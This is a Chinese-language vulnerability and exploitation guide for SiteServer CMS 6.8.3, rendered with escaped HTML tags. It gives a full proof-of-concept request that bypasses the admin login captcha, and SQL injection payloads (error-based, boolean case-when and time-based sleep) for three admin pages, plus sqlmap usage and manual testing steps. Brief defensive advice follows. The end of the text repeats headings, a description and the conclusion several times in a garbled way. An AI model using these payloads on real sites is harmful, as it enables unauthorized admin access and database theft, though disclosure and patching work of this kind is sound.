SiteServer CMS 6.8.3 漏洞分析与利用指南<\/h1>

漏洞概述<\/h2>

SiteServer CMS 是由北京百容千域软件技术开发有限公司开发的一款网站内容管理系统，广泛应用于政府、教育等机构。本文档详细分析该系统的两个关键漏洞：<\/p>

后台登录验证码绕过漏洞<\/strong><\/li>

后台多处SQL注入漏洞<\/strong><\/li> <\/ol>
1. 后台登录验证码绕过漏洞<\/h2>
漏洞描述<\/h3>
系统在验证登录时，验证码验证和账号密码验证是分开进行的，且两个请求之间没有关联性，导致攻击者可以直接发送账号密码验证请求而绕过验证码验证。<\/p>
漏洞原理<\/h3>

验证流程设计缺陷：验证码验证和账号验证分离<\/li>
无会话关联：两个验证请求之间没有建立关联机制<\/li>
无二次验证：通过账号验证后不再检查验证码状态<\/li> <\/ul>
漏洞利用方法<\/h3>
POC请求：<\/strong><\/p>
POST<\/span> \/api\/v1\/administrators\/actions\/login HTTP<\/span>\/<\/span>1.1<\/span> <\/span><\/span>Host:<\/span> 127.0.0.1<\/span> <\/span><\/span>User-Agent:<\/span> Mozilla\/5.0 (Windows NT 6.1; Win64; x64; rv:64.0) Gecko\/20100101 Firefox\/64.0<\/span> <\/span><\/span>Accept:<\/span> application\/json, text\/plain, *\/*<\/span> <\/span><\/span>Accept-Language:<\/span> zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2<\/span> <\/span><\/span>Accept-Encoding:<\/span> gzip, deflate<\/span> <\/span><\/span>Referer:<\/span> http:\/\/127.0.0.1\/SiteServer\/pageLogin.cshtml<\/span> <\/span><\/span>Content-Type:<\/span> application\/json;charset=utf-8<\/span> <\/span><\/span>Content-Length:<\/span> 84<\/span> <\/span><\/span>Connection:<\/span> keep-alive<\/span> <\/span><\/span> <\/span><\/span>{"account"<\/span>:"admin"<\/span>,"password"<\/span>:"7fef6171469e80d32c0559f88b377245"<\/span>,"isAutoLogin"<\/span>:true<\/span>} <\/span><\/span><\/code><\/pre>关键点：<\/strong><\/p> password字段为简单的MD5加密<\/li> 直接发送此POST请求即可绕过验证码验证<\/li> 无需先请求或验证验证码<\/li> <\/ul> 防御建议<\/h3> 将验证码验证与账号验证绑定在同一会话中<\/li> 在账号验证前强制验证验证码<\/li> 增加验证码令牌机制<\/li> <\/ol> 2. 后台多处SQL注入漏洞<\/h2> 漏洞1：POST字段注入<\/h3> 漏洞位置：<\/strong> \/SiteServer\/settings\/pageLogError.aspx<\/code><\/p> 漏洞描述：<\/strong> 在POST请求的多个字段中存在SQL注入漏洞<\/p> POC请求：<\/strong><\/p> POST<\/span> \/SiteServer\/settings\/pageLogError.aspx HTTP<\/span>\/<\/span>1.1<\/span> <\/span><\/span>Content-Type:<\/span> application\/x-www-form-urlencoded<\/span> <\/span><\/span>Referer:<\/span> http:\/\/127.0.0.1\/SiteServer\/main.cshtml?siteId=1<\/span> <\/span><\/span>Connection:<\/span> keep-alive<\/span> <\/span><\/span>[详细Cookie头...]<\/span> <\/span><\/span>Accept: *\/* <\/span><\/span>Accept-Encoding: gzip,deflate <\/span><\/span>Content-Length: 14041 <\/span><\/span>Host: 127.0.0.1 <\/span><\/span>User-Agent: Mozilla\/5.0 (Windows NT 6.1; WOW64) AppleWebKit\/537.21 (KHTML, like Gecko) Chrome\/41.0.2228.0 Safari\/537.21 <\/span><\/span> <\/span><\/span>1'"&DdlCategory=api&DdlPluginId=1&IDCollection=36550&TbDateFrom=01\/01\/1967&TbDateTo=01\/01\/1967&TbKeyword=1&__EVENTARGUMENT=1&__EVENTTARGET=1&__LASTFOCUS=1&__VIEWSTATE=[...长VIEWSTATE数据...]&__VIEWSTATEGENERATOR=07C334A0 <\/span><\/span><\/code><\/pre>注入点：<\/strong><\/p> 在POST数据起始处插入1'"<\/code>可触发SQL错误<\/li> 多个参数可能存在注入<\/li> <\/ul> 利用方法：<\/strong><\/p> 使用浏览器访问目标页面<\/li> 拦截正常请求<\/li> 在POST数据中插入注入payload<\/li> 使用sqlmap进行自动化测试：sqlmap -r inject.txt<\/code><\/li> <\/ol> 漏洞2：lastActivityDate参数注入<\/h3> 漏洞位置：<\/strong> \/SiteServer\/settings\/pageAdministrator.aspx<\/code><\/p> 漏洞描述：<\/strong> lastActivityDate<\/code>参数存在基于时间的盲注<\/p> POC请求：<\/strong><\/p> GET<\/span> \/SiteServer\/settings\/pageAdministrator.aspx?areaId=0&departmentId=0&keyword=1&lastActivityDate=3&order=1%2C(select%20case%20when%20(3*2*1=6%20AND%2000043=00043)%20then%201%20else%201*(select%20table_name%20from%20information_schema.tables)end)=1&pageNum=50&roleName= HTTP<\/span>\/<\/span>1.1<\/span> <\/span><\/span>X-Requested-With:<\/span> XMLHttpRequest<\/span> <\/span><\/span>Referer:<\/span> http:\/\/127.0.0.1\/SiteServer\/main.cshtml?siteId=1<\/span> <\/span><\/span>[详细Cookie头...]<\/span> <\/span><\/span><\/code><\/pre>注入特征：<\/strong><\/p> 使用条件语句进行盲注测试<\/li> 通过case when<\/code>构造布尔条件<\/li> 错误条件会尝试查询information_schema.tables<\/code>导致错误<\/li> <\/ul> 漏洞3：searchType参数注入<\/h3> 漏洞位置：<\/strong> \/SiteServer\/settings\/pageUser.aspx<\/code><\/p> 漏洞描述：<\/strong> searchType<\/code>参数存在基于时间的盲注<\/p> POC请求：<\/strong><\/p> GET<\/span> \/SiteServer\/settings\/pageUser.aspx?creationDate=0&groupId=-1&keyword=&lastActivityDate=0&loginCount=0&pageNum=0&searchType=if(now()=sysdate()%2Csleep(0)%2C0) HTTP<\/span>\/<\/span>1.1<\/span> <\/span><\/span>X-Requested-With:<\/span> XMLHttpRequest<\/span> <\/span><\/span>Referer:<\/span> http:\/\/127.0.0.1\/SiteServer\/main.cshtml?siteId=1<\/span> <\/span><\/span>[详细Cookie头...]<\/span> <\/span><\/span><\/code><\/pre>注入特征：<\/strong><\/p> 使用MySQL的if()<\/code>和sleep()<\/code>函数<\/li> 基于时间的盲注测试<\/li> 条件为真时立即返回，为假时执行sleep(0)<\/li> <\/ul> SQL注入漏洞利用建议<\/h3> 使用sqlmap自动化测试：<\/strong><\/p> 先访问目标页面获取正常请求<\/li> 保存请求数据到文件(如inject.txt)<\/li> 运行：sqlmap -r inject.txt<\/code><\/li> <\/ul> <\/li> 手工测试方法：<\/strong><\/p> 识别可能存在注入的参数<\/li> 尝试插入'<\/code>、"<\/code>、1'"<\/code>等字符观察响应<\/li> 使用布尔条件测试盲注<\/li> <\/ul> <\/li> 防御建议：<\/strong><\/p> 使用参数化查询<\/li> 实施严格的输入过滤<\/li> 最小化数据库账户权限<\/li> 启用WAF防护<\/li> <\/ul> <\/li> <\/ol> 漏洞复现步骤总结<\/h2> 验证码绕过复现：<\/strong><\/p> 直接发送提供的POC请求<\/li> 观察是否能够不提供验证码而成功登录<\/li> <\/ul> <\/li> SQL注入复现：<\/strong><\/p> 访问目标页面获取正常请求<\/li> 修改请求参数插入注入payload<\/li> 使用sqlmap或手工验证注入点<\/li> 对于盲注，观察响应时间或内容差异<\/li> <\/ul> <\/li> 特别提醒：<\/strong><\/p> 复现SQL注入前需先访问POC中的地址获取会话<\/li> 将完整请求保存为文件后再用sqlmap测试<\/li> <\/ul> <\/li> <\/ol> 结论<\/h2> SiteServer CMS 6.8.3版本存在严重的安全漏洞，攻击者可利用验证码绕过漏洞轻易进入后台，再利用多处SQL注入漏洞获取数据库敏感信息。建议用户及时升级到最新版本或实施相应的安全防护措施。<\/p>

SiteServer CMS 6.8.3 漏洞分析与利用指南<\/h1>

1. 后台登录验证码绕过漏洞<\/h2>

漏洞描述<\/h3> 系统在验证登录时，验证码验证和账号密码验证是分开进行的，且两个请求之间没有关联性，导致攻击者可以直接发送账号密码验证请求而绕过验证码验证。<\/p>

2. 后台多处SQL注入漏洞<\/h2>

结论<\/h2> SiteServer CMS 6.8.3版本存在严重的安全漏洞，攻击者可利用验证码绕过漏洞轻易进入后台，再利用多处SQL注入漏洞获取数据库敏感信息。建议用户及时升级到最新版本或实施相应的安全防护措施。<\/p>

漏洞描述<\/h3>
系统在验证登录时，验证码验证和账号密码验证是分开进行的，且两个请求之间没有关联性，导致攻击者可以直接发送账号密码验证请求而绕过验证码验证。<\/p>

结论<\/h2>
SiteServer CMS 6.8.3版本存在严重的安全漏洞，攻击者可利用验证码绕过漏洞轻易进入后台，再利用多处SQL注入漏洞获取数据库敏感信息。建议用户及时升级到最新版本或实施相应的安全防护措施。<\/p>